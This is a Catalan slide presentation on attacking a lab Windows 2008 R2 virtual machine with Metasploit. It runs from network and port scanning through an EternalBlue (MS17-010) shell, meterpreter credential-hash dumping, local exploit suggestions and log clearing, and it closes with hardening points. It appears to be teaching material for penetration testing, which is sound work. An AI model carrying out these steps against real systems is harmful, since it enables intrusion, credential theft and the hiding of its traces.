---
title: "Atacar amb Metasploit"
author: "Adrià Quintero Lázaro"
---

# PUNTS DE LA PRESENTACIÓ

- 0. Introducció: Què és i com funciona Metasploit

- 1. Atac amb Metasploit: Descobrir dispositius

- 2. Atac amb Metasploit: Accedir als dispositius descoberts

- 3. Atac amb Metasploit: Obtenir privilegis al sistema

- 4. Atac amb Metasploit: Recollir informació del sistema

- 5. Atac amb Metasploit: Netejar el rastre

- 6. Conclusions: Aspectes a tenir en compte per reforçar la seguretat de la màquina


# 0. QUÈ ÉS METASPLOIT?

- Entorn de treball Open Source

- Proporciona informació sobre les vulnerabilitats del sistema

- Permet automatitzar diverses tasques

- Tests de penetració i desenvolupament de signatures per als sistemes de detecció d'intrusos.


# 0. COM FUNCIONA METASPLOIT?

- Base de dades PostgreSQL

- Exploits

- Mòduls

# 1. DESCOBRIR DISPOSITIUS

## IP scan

- Exemple d'escaneig IP mitjançant mòduls (arp_sweep):

```
msf5 auxiliary(scanner/discovery/arp_sweep) > run

[+] 192.168.0.1 appears to be up (UNKNOWN).
[+] 192.168.0.10 appears to be up (UNKNOWN).
[+] 192.168.0.11 appears to be up (UNKNOWN).
[+] 192.168.0.17 appears to be up (UNKNOWN).
[+] 192.168.0.21 appears to be up (CADMUS COMPUTER SYSTEMS).
[+] 192.168.0.22 appears to be up (UNKNOWN).
[+] 192.168.0.23 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

- Exemple d'escaneig IP amb Nmap:

```
msf5 > db_nmap -sP 192.168.0.0/24
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 13:28 EDT
[*] Nmap: Nmap scan report for 192.168.0.1
[*] Nmap: Host is up (0.0043s latency).
...
[*] Nmap: Nmap done: 256 IP addresses (9 hosts up) scanned in 28.24 seconds
```

# 1. DESCOBRIR DISPOSITIUS

## Port scan

- Exemple d'escaneig de ports mitjançant mòduls (syn):

```
msf5 auxiliary(scanner/portscan/syn) > run

[+]  TCP OPEN 192.168.0.21:22
[+]  TCP OPEN 192.168.0.21:135
[+]  TCP OPEN 192.168.0.21:139
[+]  TCP OPEN 192.168.0.21:445
[+]  TCP OPEN 192.168.0.21:3389
[+]  TCP OPEN 192.168.0.21:5985
```

- Exemple d'escaneig de ports amb Nmap:

```
msf5 auxiliary(scanner/portscan/syn) > db_nmap 192.168.0.21
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:31 EDT
[*] Nmap: Nmap scan report for 192.168.0.21
[*] Nmap: Host is up (0.0049s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT      STATE SERVICE
[*] Nmap: 22/tcp    open  ssh
[*] Nmap: 135/tcp   open  msrpc
...
[*] Nmap: MAC Address: 08:00:27:F7:55:D2 (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 15.40 seconds
```

# 1. DESCOBRIR DISPOSITIUS

## Detecció del sistema operatiu i la seva versió

- Exemple de detecció del sistema mitjançant mòduls (smb_version):

```
msf5 auxiliary(scanner/smb/smb_version) > run

[+] 192.168.0.21:445      - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:VAGRANT-2008R2) (workgroup:WORKGROUP ) (signatures:optional)
[*] 192.168.0.21:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- Exemple d'escaneig dels ports i detecció del sistema amb Nmap:

```
msf5 auxiliary(scanner/smb/smb_version) > db_nmap -sS -sV -O 192.168.0.21
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 10:56 EDT
[*] Nmap: Nmap scan report for 192.168.0.21
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 989 closed ports
[*] Nmap: PORT      STATE SERVICE      VERSION
[*] Nmap: 22/tcp    open  ssh          OpenSSH 7.1 (protocol 2.0)
...
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 84.37 seconds
```

# 2. ACCEDIR ALS DISPOSITIUS DESCOBERTS

- Revisió dels ports oberts

- Escaneig de vulnerabilitats al port que volem atacar:

```
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
```

- Aprofitar les vulnerabilitats descobertes (exploits i atacs de diccionari)

# 2. ACCEDIR ALS DISPOSITIUS DESCOBERTS

## Atac mitjançant exploits

- Exemple d'execució del mòdul ms17_010_eternalblue:
```
[*] Command shell session 1 opened (192.168.0.19:4444 -> 192.168.0.21:49159) at 2020-05-02 08:49:38 -0400
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.21:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



C:\Windows\system32>
```

# 2. ACCEDIR ALS DISPOSITIUS DESCOBERTS

## Atac de diccionari

<p align="center">
  <img src="../aux/brute-force.png">
</p>


# 3. OBTENIR EL CONTROL DEL DISPOSITIU

- Creació d'usuaris, canvis de contrasenyes i assignar permisos d'administrador

- Veure els usuaris del sistema i obtenir informació sobre els comptes

- Utilització de payloads

- Escalar privilegis mitjançant Meterpreter

- Escalar privilegis mitjançant exploits


# 4. RECOLLIR INFORMACIÓ DEL SISTEMA:

- Extracció de contrasenyes (meterpreter):

```
meterpreter > run post/windows/gather/credentials/credential_collector 

[*] Running module against VAGRANT-2008R2
[+] Collecting hashes...
    Extracted: Administrator:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: sshd_server:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035
    Extracted: test:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9
    Extracted: vagrant:aad3b435b51404eeaad3b435b51404ee:41291269bf30dc4c9270a8b888e3bbe9
```

- Descàrrega de directoris i fitxers (meterpreter)

- Cerca de vulnerabilitats de l'equip localment:

```
[*] 192.168.0.21 - Collecting local exploits for x64/windows...
[*] 192.168.0.21 - 13 exploit checks are being tried...
[+] 192.168.0.21 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 192.168.0.21 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
```

# 5. NETEJAR EL RASTRE

## Eliminar els logs a un sistema Windows

- Eliminació dels logs mitjançant meterpreter
<p align="center">
  <img src="../aux/windows.png">
</p>

# 5. NETEJAR EL RASTRE

## Eliminar els logs a un sistema Linux

- Eliminació dels logs manualment
- Eliminació de l'historial de comandes

<p align="center">
  <img src="../aux/linux.svg">
</p>



# 6. ASPECTES A TENIR EN COMPTE PER REFORÇAR LA SEGURETAT DE LA MÀQUINA

- Comprovació dels ports oberts

- Servei SMB: MS17-010

- Servei SSH

- Servei RPC

- Servei RDP


# DEMOSTRACIÓ PRÀCTICA
